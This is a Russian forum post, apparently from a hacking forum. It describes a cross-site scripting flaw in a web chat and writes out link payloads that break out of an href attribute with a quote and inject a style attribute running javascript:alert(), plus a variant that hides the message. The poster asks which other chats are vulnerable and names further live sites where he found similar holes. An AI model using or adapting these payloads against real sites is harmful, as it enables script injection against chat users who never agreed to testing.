в чате nashchat.ru нашёл уязвимость:
если пишешь что-то типа </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://www.some.ru[/QUOTE]<span id='postcolor'> то это преобразуется в ссылку. В чате отоброжается как:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><a href="http://www.somechat.ru">http://www.somechat.ru</a>
[/QUOTE]<span id='postcolor'>
А если так:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://www.some.ru"style="background:url(javascript:alert ())
[/QUOTE]<span id='postcolor'>

А чтоб твоё сообщение не было видно:

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://www.somechat.ru"style="background:url(javascript:a lert())"aaa=`>[/QUOTE]<span id='postcolor'>

Тогда в чате отображается как:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><a href="http://www.somechat.ru"style="background:url(javascript:a lert())"aaa=`>">http://www.somechat.ru"style="background:url(javascript:a lert())"aaa=`></a>
[/QUOTE]<span id='postcolor'>
Проблема в том, что в скрипте нельзя использовать пробелы(&amp; не пропускается). Сейчас баг исправили, но я думаю что такую фигню можно сделать на некоторых других чатах. (Ни кто не знает на каких? http://forum.antichat.ru/iB_html/non...cons/smile.gif )
&quot;'`&lt;&gt;\%&amp;

Большинство чатов фильтруют кавычку в ссылках, поэтому это не работает. Но иногда прокатывает, например вот здесь я находил подобную уязвимость http://cafe.chanson.ru и здесь http://join.chillout.net.ru/join.thtml